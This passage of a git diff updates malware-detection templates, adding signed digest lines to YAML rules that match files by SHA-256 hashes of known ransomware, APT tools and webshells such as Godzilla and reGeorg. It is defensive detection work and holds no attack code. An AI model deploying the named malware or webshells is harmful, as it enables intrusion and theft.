4b0a00483046022100dfadd7cd1cea6ebbe1aa3f69f7625179ee00f5d1c2ccfd5d1e79e315886c3a81022100eb9016ec39cecbd2cd4b0c0dbd6d0c368d821f2881efb34ab5554ced703dd597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/flipflop-malware-hash.yaml b/file/malware/hash/flipflop-malware-hash.yaml index b466390428..9d444af9b8 100644 --- a/file/malware/hash/flipflop-malware-hash.yaml +++ b/file/malware/hash/flipflop-malware-hash.yaml @@ -18,4 +18,5 @@ file: - "sha256(raw) == 'ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330'" - "sha256(raw) == 'b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c'" - "sha256(raw) == 'ad67aaa50fd60d02f1378b4155f69cffa9591eaeb80523489a2355512cc30e8c'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100898dba3d21d00acd15b0d9328ff3c9b58792f741caff519072c7a6649f37a2bb022100980b0d759b9d2b8464858ecaa9bb3f65db5588bd5dccacf73ad8e95beb6ba0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/furtim-malware-hash.yaml b/file/malware/hash/furtim-malware-hash.yaml index 04c67fca6a..6783796900 100644 --- a/file/malware/hash/furtim-malware-hash.yaml +++ b/file/malware/hash/furtim-malware-hash.yaml @@ -20,3 +20,4 @@ file: - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" condition: or +# digest: 490a0046304402201cc666527fe4048ffb13776e5608001310f5f01ee9ca75e2627a6eb72fd527ea0220037ef8c644ec2d014e18264aa1d93968ae0aa1c6bd2cae7f28ea60a89d7ba2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/gimmick-malware-hash.yaml b/file/malware/hash/gimmick-malware-hash.yaml index 950936cdfe..ecb983f709 100644 --- a/file/malware/hash/gimmick-malware-hash.yaml +++ b/file/malware/hash/gimmick-malware-hash.yaml @@ -15,4 +15,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f'" \ No newline at end of file + - "sha256(raw) == '2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f'" +# digest: 4b0a004830460221009a442dbe1b3ff7ed49002fc578c8ad40e1c5a5855deaff427a05a0f1cd6ff4de022100953b763bcdad0701a73662bb7a3af2afa83bb5a161fc87762e19bea7b9293a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/godzilla-webshell-hash.yaml b/file/malware/hash/godzilla-webshell-hash.yaml index a37489fa00..9efa893818 100644 --- a/file/malware/hash/godzilla-webshell-hash.yaml +++ b/file/malware/hash/godzilla-webshell-hash.yaml @@ -16,4 +16,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe'" \ No newline at end of file + - "sha256(raw) == '2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe'" +# digest: 4b0a00483046022100ef923e9e696242b4b131011cefeea985b6ff2d5a336f3d987fd240f9717ee34f022100f563f8d4f335a993968b3e542f5f944381f033939dcf870a4b823414fc9f1eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/greenbug-malware-hash.yaml b/file/malware/hash/greenbug-malware-hash.yaml index de608feb9b..97a2f53c22 100644 --- a/file/malware/hash/greenbug-malware-hash.yaml +++ b/file/malware/hash/greenbug-malware-hash.yaml @@ -29,4 +29,5 @@ file: - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" - condition: or \ No newline at end of file + condition: or +# digest: 4a0a00473045022077930b63738553480367e50314899ea548fca78cf499bfa0b139e798e7af18e10221008a78bcf158ccf90ec42fc2fca2f4bab5b64c36395f1913f238cd66f65ac0307f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/ico-malware-hash.yaml b/file/malware/hash/ico-malware-hash.yaml index a8f42aa1a9..adf6edc34d 100644 --- a/file/malware/hash/ico-malware-hash.yaml +++ b/file/malware/hash/ico-malware-hash.yaml @@ -22,3 +22,4 @@ file: - "sha256(raw) == '7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896'" - "sha256(raw) == 'aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868'" condition: or +# digest: 4a0a0047304502210080d59fa91d32936cfa59f88492591cf309cfe06721ee5455cf7a3d3d2659f7be022045f58959e4c91fa9a13f740e85981ffc1446d47d186a076d56a1d9333bc0a053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/industroyer-malware-hash.yaml b/file/malware/hash/industroyer-malware-hash.yaml index c1798d81c4..8860a9ced4 100644 --- a/file/malware/hash/industroyer-malware-hash.yaml +++ b/file/malware/hash/industroyer-malware-hash.yaml @@ -26,3 +26,4 @@ file: - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" condition: or +# digest: 4b0a0048304602210080c6157e9dddd2e4fe5922dd89a088a382a7a9dcabcf3ed2be3ff364360e98c1022100da6a030cb87f7367d5c71f98b05dfa0a58e549c124b8a9f0f51bb91e759a6739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/ironPanda-htran-malware-hash.yaml b/file/malware/hash/ironPanda-htran-malware-hash.yaml index b8cc9c0d46..680a6050f7 100644 --- a/file/malware/hash/ironPanda-htran-malware-hash.yaml +++ b/file/malware/hash/ironPanda-htran-malware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file + - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" +# digest: 4a0a00473045022100d46d3b9acc96f4f2d0e9d79c1fea714162bffb0316d45fedbb295bbc340ee9ff022046c6f4bb7568faccfca86380525231205674d4981d46dbb71997fe16c40acd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml index 3bacd1aef4..2d05cc915b 100644 --- a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml +++ b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file + - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" +# digest: 4b0a004830460221009fec136cd6afff7b6e05ee7021c47aee0953b31c0030092762b41815389c523f022100b5cb901c2eee61091dea87d53fcdda19e9da866a39d257ac2de919a33104545e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/ironpanda-malware-hash.yaml b/file/malware/hash/ironpanda-malware-hash.yaml index dba97a70dd..674fded1e8 100644 --- a/file/malware/hash/ironpanda-malware-hash.yaml +++ b/file/malware/hash/ironpanda-malware-hash.yaml @@ -20,3 +20,4 @@ file: - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" condition: or +# digest: 490a0046304402200301d42c3766d7c293b5be428964594c852c2260bf2ff065cde79c007f542c6e022039dbb512053399446bd53d7648cef7c93c2d49e412421e21eaec413e308386a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/locky-ransomware-hash.yaml b/file/malware/hash/locky-ransomware-hash.yaml index 8092b89a1d..1bdbbd95d0 100644 --- a/file/malware/hash/locky-ransomware-hash.yaml +++ b/file/malware/hash/locky-ransomware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file + - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" +# digest: 490a0046304402205302c66b95d066ed9cdc9d92c33deb5f2d674759f72d1ac5dfc687b47623b2b40220008fa3589f8df52fabb50eb4c2625e78c5b287edbe1d594de5306e78e162159b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/minidionis-readerview-malware-hash.yaml b/file/malware/hash/minidionis-readerview-malware-hash.yaml index ff0bf7ff66..d3fd56a6cb 100644 --- a/file/malware/hash/minidionis-readerview-malware-hash.yaml +++ b/file/malware/hash/minidionis-readerview-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" condition: or +# digest: 490a00463044022029fa96cb482d568ef5bf8d61cb9dbc4d963eceebc921fde94f9982cb64b935d402202293f5472d0f763fdece65b66eaf4689cbc5d2f5d808519ea4ec296396c593b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/minidionis-vbs-malware-hash.yaml b/file/malware/hash/minidionis-vbs-malware-hash.yaml index 73d5179ee0..5db165e586 100644 --- a/file/malware/hash/minidionis-vbs-malware-hash.yaml +++ b/file/malware/hash/minidionis-vbs-malware-hash.yaml @@ -17,3 +17,4 @@ file: - type: dsl dsl: - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" +# digest: 4b0a00483046022100da5188e98d74fb2871b54281c14edb11d3cd3a8a80be3458fe046c8a778eb4c5022100ee694e6a02206cbebc6d1e51e273197da0e84da2d689bf05bf7cb793ee0a79fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml index c4fc21e7ab..1c2f5697c5 100644 --- a/file/malware/hash/naikon-apt-malware-hash.yaml +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -17,3 +17,4 @@ file: - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" condition: or +# digest: 490a00463044022076875f93e0837f92458a066ed23b9fbea85795d9bd3818b632f26b9830cdfe7f02200695449446fb36a39c556f565454dc45bdd1cf83850ce2f4eae8fc83426f858b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/neuron2-malware-hash.yaml b/file/malware/hash/neuron2-malware-hash.yaml index 3af07aaeb5..d61faa21b8 100644 --- a/file/malware/hash/neuron2-malware-hash.yaml +++ b/file/malware/hash/neuron2-malware-hash.yaml @@ -18,3 +18,4 @@ file: - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" condition: or +# digest: 4a0a00473045022100b91242669db5c8dd0752bac8fb27f0341d9c54b95649fde172eddb7f11e42cb6022054904c777180e063b25b9ff387271f645a7b48bc1579bf75bae794434bfc6278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/oilrig-malware-hash.yaml b/file/malware/hash/oilrig-malware-hash.yaml index 3317cdbd78..c87d7c15d0 100644 --- a/file/malware/hash/oilrig-malware-hash.yaml +++ b/file/malware/hash/oilrig-malware-hash.yaml @@ -43,3 +43,4 @@ file: - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" condition: or +# digest: 4a0a0047304502210085d96f05788b748eedd91c43988d796235303e23997bc1d3f5735191fd59ffb302204fb4f4ba3b7aebb86798c381bbcf8d52bbec17bed121f64ae7410ae58752efe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/passcv-ntscan-malware-hash.yaml b/file/malware/hash/passcv-ntscan-malware-hash.yaml index 424537662c..0f68e12b7c 100644 --- a/file/malware/hash/passcv-ntscan-malware-hash.yaml +++ b/file/malware/hash/passcv-ntscan-malware-hash.yaml @@ -16,4 +16,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" \ No newline at end of file + - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" +# digest: 4a0a00473045022100ef569acf5832341fe83e664fce030dde8d6a789d88ea519a176006b84fbf974102200a8bbb01f4093a07e414713794649a23bbed2a276047dbdee33904e785c0da8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/passcv-sabre-malware-hash.yaml b/file/malware/hash/passcv-sabre-malware-hash.yaml index 5fddb23e59..3e4fa13571 100644 --- a/file/malware/hash/passcv-sabre-malware-hash.yaml +++ b/file/malware/hash/passcv-sabre-malware-hash.yaml @@ -27,3 +27,4 @@ file: - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" condition: or +# digest: 4b0a00483046022100bb57b949c8e28620c7417e341c8d9a8907fb74729ce011786c24a92b4ca22e35022100893e162903cd2ff3df101f8387cc853547dcfe05ea302b155a275de2e9c41a55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/passcv-signingcert-malware-hash.yaml b/file/malware/hash/passcv-signingcert-malware-hash.yaml index 0557ab8fe3..c531ca247d 100644 --- a/file/malware/hash/passcv-signingcert-malware-hash.yaml +++ b/file/malware/hash/passcv-signingcert-malware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file + - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" +# digest: 490a0046304402204af796f5fa792d02c6a8bb14ae8eb53f61509ac8c892258295432da49fdbc1480220362b731e34545f2a4bee533332d1a6a3aea6d77212f65e8f828008eb4f292d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index 54648fae7f..551d7126e9 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -17,3 +17,4 @@ file: - type: dsl dsl: - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" +# digest: 490a0046304402205fce9f775ef7254eef34677dcc81f51559dc834c5c2eeb672ff24d9324815f260220294f60f0d4ef47b431a13e731f08297d3752aee94eb353cc7e0675f59e2210f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml index 237d217ba2..f928121f7f 100644 --- a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml @@ -25,3 +25,4 @@ file: - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" condition: or +# digest: 4a0a0047304502205c7960057abca1e94efd07fcd2bc813a5dcd5209f873d23868e1f0d5a19ca821022100a17c02d95228708905fc176fa851e56d051a4e511b917a5102f38367137469c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/poseidongroup-malware-hash.yaml b/file/malware/hash/poseidongroup-malware-hash.yaml index 9db84bd8ec..36b3a8f549 100644 --- a/file/malware/hash/poseidongroup-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" condition: or +# digest: 4b0a00483046022100f7c5703b73da9fe78478c825c053b67e4e75371245aa7489cb0a22ead0ee79d5022100f4a0150095490908afb25a07519eff6b905131b6a0f58e304d61b2d15d18c029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/powerstar-malware-hash.yaml b/file/malware/hash/powerstar-malware-hash.yaml index 9a09056a27..092d54526d 100644 --- a/file/malware/hash/powerstar-malware-hash.yaml +++ b/file/malware/hash/powerstar-malware-hash.yaml @@ -19,4 +19,5 @@ file: - "sha256(raw) == '977cf5cc1d0c61b7364edcf397e5c67d910fac628c6c9a41cf9c73b3720ce67f'" - "sha256(raw) == 'b79d28fe5e3c988bb5aadb12ce442d53291dbb9ede0c7d9d64eec078beba5585'" - "sha256(raw) == 'de99c4fa14d99af791826a170b57a70b8265fee61c6b6278d3fe0aad98e85460'" - condition: or \ No newline at end of file + condition: or +# digest: 4a0a00473045022100c59f8345390ed874e19a409d83e81e8e4983951424b99e4ec92c55e1fda3095a0220534e1c7739b4a3ebe32295cf964da7913a4209908375470d3bf3a52b0e55ea7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml index f9bbc2d775..aa2ece1518 100644 --- a/file/malware/hash/purplewave-malware-hash.yaml +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -25,3 +25,4 @@ file: - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" condition: or +# digest: 4a0a0047304502200a8245b0a3c7375545abcabcb3b33ffcff0a1eeb20bd2fc61b2cedd412a97af4022100f83b9afd37e264a8aad2d6e2fa7578dabf98dd1c0026bbe56e2c7b4a83067a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/red-leaves-malware-hash.yaml b/file/malware/hash/red-leaves-malware-hash.yaml index 56146d3ac9..a1f0562aa0 100644 --- a/file/malware/hash/red-leaves-malware-hash.yaml +++ b/file/malware/hash/red-leaves-malware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file + - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" +# digest: 4b0a00483046022100e005ae711375ad8bcf2a49e18c04bfb90ff364e98536e2bfc8f5e38b87cc2cca02210093fef295bd17322908b99c750aeb6d770a932e4ef181155033491e7948417b10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/regeorg-webshell-hash.yaml b/file/malware/hash/regeorg-webshell-hash.yaml index a3abb6c429..386995ab5a 100644 --- a/file/malware/hash/regeorg-webshell-hash.yaml +++ b/file/malware/hash/regeorg-webshell-hash.yaml @@ -17,3 +17,4 @@ file: - type: dsl dsl: - "sha256(raw) == 'f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845'" +# digest: 4b0a00483046022100b886e1dd58565f1e41c52634fd7e09dc53c65bcdcc1b14a157de50a37b1dbb03022100b0a926bd917b70266d4c40a32b2b3949208df60d484e07cad9f986e02c981591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index bbeb49e3a9..c6248e390f 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -21,3 +21,4 @@ file: - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" condition: or +# digest: 490a00463044022030315d30078780deb8a78ae5d5f60f7cd37d74e1c5bfb3b6b64887f2f360e684022070842ec63bc9e309f9544b72d2af4ca7fea4f61feea98a8e688402a05223f797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml index 24e6390883..c2530de62f 100644 --- a/file/malware/hash/rokrat-malware-hash.yaml +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -17,4 +17,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file + - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" +# digest: 4a0a00473045022100cbca5cefa61b6acec8204a107a830aedaa9b77743dee62a6df116671697de095022019a1e5310e6a892e439ed9d62abdec4048b1a41302bce3e9a48b5a6b1a6b3e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sauron-malware-hash.yaml b/file/malware/hash/sauron-malware-hash.yaml index 00d6694701..9987c3bea9 100644 --- a/file/malware/hash/sauron-malware-hash.yaml +++ b/file/malware/hash/sauron-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" condition: or +# digest: 4a0a004730450221008e7a7a44b0f2312c12e329c1fa90993dca6639bfcaf506375a7e19199f928d91022049aea6fa5d5e897ced02e4b011a1fe807c1740d31288ded179adef93a324b451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/seaduke-malware-hash.yaml b/file/malware/hash/seaduke-malware-hash.yaml index ea230ee435..7bd6c3c47a 100644 --- a/file/malware/hash/seaduke-malware-hash.yaml +++ b/file/malware/hash/seaduke-malware-hash.yaml @@ -15,4 +15,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file + - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" +# digest: 4a0a004730450220328674c05db281adf560456a17e9ad8f2f5aac25f906a25a73243179a729e05a022100f9c17cc31939f99fda66c3a04f9dae80f5425085d8e3aad7092b3d5746cbca0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sfx1-malware-hash.yaml b/file/malware/hash/sfx1-malware-hash.yaml index 2644b8af66..038401cb69 100644 --- a/file/malware/hash/sfx1-malware-hash.yaml +++ b/file/malware/hash/sfx1-malware-hash.yaml @@ -19,3 +19,4 @@ file: - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" condition: or +# digest: 4a0a0047304502204272d1926af9a4b43db2568f6d4c0bf65679cbc954a8e2b460218757bd396aca022100d8fa5e49e3e86ad3ed76354cf1429765f7a0dda2459a041030ddf85eb7093aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml index 4d81949cbe..3d59d5ebc0 100644 --- a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml +++ b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml @@ -18,4 +18,5 @@ file: - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100c6c00d587c785d24265f7e10ab085570073dd32002bd3e0ffad8a63068abf9a9022100d5c1fde8a605a53dc23a8f5c1c77d481a575ab9e3560d00883d94eca3eb1b3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sharpext-malware-hash.yaml b/file/malware/hash/sharpext-malware-hash.yaml index 858ece9035..94395fc91b 100644 --- a/file/malware/hash/sharpext-malware-hash.yaml +++ b/file/malware/hash/sharpext-malware-hash.yaml @@ -18,4 +18,5 @@ file: - "sha256(raw) == '1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00'" - "sha256(raw) == '6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4'" - "sha256(raw) == '6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c'" - condition: or \ No newline at end of file + condition: or +# digest: 490a004630440220166c9ddf0b8014895bc3de5996c6d6f45ff984d15b0d844ae31939ff88565a8b02202f41393091a5d0dd61fc9d5e73b74fabd6079dbfdf3f7e7d3da31885e4b83706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sofacy-Winexe-malware-hash.yaml b/file/malware/hash/sofacy-Winexe-malware-hash.yaml index db4db62626..acfe245405 100644 --- a/file/malware/hash/sofacy-Winexe-malware-hash.yaml +++ b/file/malware/hash/sofacy-Winexe-malware-hash.yaml @@ -18,3 +18,4 @@ file: - type: dsl dsl: - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" +# digest: 4a0a00473045022100bfa5f862b9a3d7ae378db20014a21abcaa89423a54f5cb610e7052fd39b010f602204fab7ff0a1e46cb6f2fb4e58ce4fba4fd26a2a2ea86ef56bebeb62c576f4db1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sofacy-bundestag-malware-hash.yaml b/file/malware/hash/sofacy-bundestag-malware-hash.yaml index 30a09f0a27..07ac18d128 100644 --- a/file/malware/hash/sofacy-bundestag-malware-hash.yaml +++ b/file/malware/hash/sofacy-bundestag-malware-hash.yaml @@ -20,3 +20,4 @@ file: - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" condition: or +# digest: 4a0a00473045022060d89cde1c9c008616d7c26b0aea10adaea8192f389d974c7ac5fafc3605cc24022100b8a5b47998bd59295910ac1bde5a3c217bef1cf7e7201be178e40126b3e58b03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/sofacy-fybis-malware-hash.yaml b/file/malware/hash/sofacy-fybis-malware-hash.yaml index 16b7ef433c..1df0e79e08 100644 --- a/file/malware/hash/sofacy-fybis-malware-hash.yaml +++ b/file/malware/hash/sofacy-fybis-malware-hash.yaml @@ -19,3 +19,4 @@ file: - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" condition: or +# digest: 490a0046304402204dcd560e243c6c18694552280239061cac8d3d31ffb9cbd4ca0356d62fdb7a4c02202d8095d58777f0b552931edec0d3713af46318d70caa0638f947a0ebe4c2b4fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/tidepool-malware-hash.yaml b/file/malware/hash/tidepool-malware-hash.yaml index ca7773b2b2..6b3dc051c0 100644 --- a/file/malware/hash/tidepool-malware-hash.yaml +++ b/file/malware/hash/tidepool-malware-hash.yaml @@ -22,3 +22,4 @@ file: - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" condition: or +# digest: 